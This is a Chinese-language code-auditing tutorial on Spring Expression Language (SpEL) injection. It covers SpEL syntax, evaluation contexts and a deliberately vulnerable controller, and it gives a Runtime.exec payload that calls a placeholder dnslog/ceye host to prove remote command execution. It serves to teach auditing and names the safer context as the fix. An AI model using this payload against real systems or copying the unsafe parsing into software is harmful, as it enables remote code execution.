Java代码审计SpEL表达式注入

技术分享 9个月前 (06-09) 0 999+

一、SpEL表达式概念

Spring Expression Language（SpEL） 是 Spring Framework 提供的一种功能强大的表达式语言，全称为 Spring Expression Language，简称 SpEL。它类似于 Struts2 中的 OGNL 表达式语言，旨在为静态的 Java 语言增加动态执行能力，使开发者可以以一种更简洁、灵活的方式访问对象属性、调用方法、进行逻辑运算和动态赋值。

二、SpEL 的作用和应用场景

SpEL 的设计初衷是为了简化开发工作，提供一种 在运行时动态解析和执行表达式 的机制，常用于如下场景：

配置 Bean 的属性值（配合 @Value 注解）
Spring Security 权限表达式
Spring Data JPA 查询表达式
条件逻辑控制（如 SPEL 条件注解 @ConditionalOnExpression）
模板引擎中处理动态数据
静态方法调用或对象动态构造

举个简单例子，@Value("#{user.name}") 能让你动态从某个 Bean 中获取字段值注入到另一个 Bean 中。

SpEL 不仅支持属性访问和方法调用，还支持集合操作、正则匹配、表达式求值、对象创建等，是 Spring 应用中的通用表达式解析工具。

三、SpEL支持的功能特性

SpEL 主要支持以下操作：

功能	示例	描述
文字表达式	`'hello'`, `123`, `true`	字符串、数字、布尔值、null
属性访问	`person.name`	访问对象属性
方法调用	`'abc'.toUpperCase()`	调用实例方法
静态方法	`T(java.lang.Math).random()`	访问 Java 类的静态方法或字段
对象创建	`new java.util.Date()`	实例化对象
集合操作	`list[0]`, `map['key']`	访问数组、List、Map
关系运算符	`age > 18`	比较操作，如 >、<、== 等
逻辑运算符	`true and false`	`and`、`or`、`not` 逻辑组合
条件（三元）运算符	`score > 60 ? '及格' : '不及格'`	简化条件判断
正则表达式	`'abc' matches '[a-z]+'`	字符串正则匹配
Bean 引用	`@myBean`	引用 Spring 容器中的 Bean
投影操作	`list.![name]`	从集合中提取每个元素的某个属性
过滤操作	`list.?[age > 18]`	过滤集合中满足条件的元素
变量引用	`#name`, `#user.age`	使用上下文中定义的变量
模板表达式	`"Welcome, #{#user.name}!"`	与字符串模板结合生成动态字符串

四、SpEL的执行机制

ExpressionParser
EvaluationContext

ExpressionParser（表达式解析器）

用于将字符串形式的表达式解析为 Expression 对象：

ExpressionParser parser = new SpelExpressionParser(); Expression expr = parser.parseExpression("user.age");

EvaluationContext（表达式上下文）

在执行表达式时提供变量、对象、函数等运行环境，简单来说，它是表达式执行的运行环境。

StandardEvaluationContext context = new StandardEvaluationContext(user); int age = expr.getValue(context, Integer.class);

主要有 StandardEvaluationContext 和 SimpleEvaluationContext两种

有些老版本不支持SimpleEvaluationContext，并且如果不做特意说明的情况下，默认是使用更不安全的StandardEvaluationContext

其中StandardEvaluationContext功能最强大，支持SpEL的所有特性，而SimpleEvaluationContext功能受限，专为安全场景设计

功能类别	StandardEvaluationContext ✅	SimpleEvaluationContext 🛡️	说明
设置根对象	✅ 支持	✅ 支持	设置表达式的默认作用对象
设置变量	✅ 支持	✅ 支持	可使用 `#varName` 形式
注册自定义函数	✅ 支持	❌ 不支持	可用静态方法注册为函数
访问 Java 类	✅ 支持（T(...)）	❌ 不支持	如 `T(java.lang.Math).PI`
调用构造函数	✅ 支持（new）	❌ 不支持	如 `new java.util.Date()`
访问 Spring Bean	✅ 支持（配合 BeanResolver）	❌ 不支持	通过 `@beanName` 引用
方法调用	✅ 支持	⚠️ 仅支持 getter	完整方法调用或属性访问
修改属性	✅ 支持	❌ 不支持	只读上下文不允许修改
集合筛选与投影	✅ 支持	❌ 不支持	如 `list.?[age>18]`
自定义类型转换器	✅ 支持	❌ 不支持	用于自定义表达式值转换
安全性	❌ 不安全	✅ 高安全性	用户输入不应使用标准上下文
适用场景	内部逻辑、系统配置	用户输入、REST绑定等	用于信任 vs 不信任来源

五、SpEL表达式使用方法

1、基于注解

一般是写死在代码中，没有很大的可能能利用

@Value("#{2 * 10}") private int result;  @Value("#{systemProperties['user.name']}") private String userName;

2、XML

也是写死在代码中，但是可以配合某些特定组件的Nday漏洞利用，如jackjson的CVE-2017-17485、weblogic的CVE-2019-2725

<bean id="exampleBean" class="com.example.MyBean">     <property name="value" value="#{T(java.lang.Math).random() * 100}" /> </bean>

3、外部传入动态执行

外部传入的方式非常之危险

@GetMapping("/spel") public String spel(@RequestParam String spel) {     ExpressionParser parser = new SpelExpressionParser();     Expression expression = parser.parseExpression(spel);     Object value = expression.getValue();     return "结果: " + value; }

六、SpEL注入示例

    /**      * SpEL to RCE      * http://localhost:8080/spel/vul/?expression=xxx.      * xxx is urlencode(exp)      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")      */     @GetMapping("/spel/vuln")     public String rce(String expression) {         ExpressionParser parser = new SpelExpressionParser();         // fix method: SimpleEvaluationContext         Expression expression1 = parser.parseExpression(expression);         Object obje = expression1.getValue();         String obj_str = obje.toString();         return obj_str;      }

ExpressionParser parser = new SpelExpressionParser();创建了一个表达式解析，将传入的expression解析为Expression对象

最终通过getValue方法执行表达式，parseExpression方法并不会执行表达式，最终的执行还是在getValue()

那么可以构造Payload为T(java.lang.Runtime).getRuntime().exec("curl xxx.dnslog.cn")

这里获取Runtime类，并通过调用Runtime.getRuntime.exec()进行命令执行

相关SpEL语法可见https://zhuanlan.zhihu.com/p/339619962